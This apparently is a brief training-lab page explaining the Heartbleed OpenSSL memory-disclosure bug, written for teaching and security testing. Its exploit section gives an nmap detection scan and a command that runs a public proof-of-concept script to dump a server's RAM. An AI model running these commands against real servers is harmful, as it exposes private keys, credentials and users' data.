Heartbleed

What is it?

The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).

The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users.

Exploit

With SensePost's Heartbleed exploit script (heartbleed-poc.py) we can steal RAM from the vulnerable OpenSSL server: https://github.com/sensepost/heartbleed-poc

Nmap scan for vulnerability

nmap -p 443 --script ssl-heartbleed www.test.com

Pull RAM from OpenSSL server potentially showing sensitive data

heartbleed-poc.py -f /home/student/dump.bin www.test.com| less

Last updated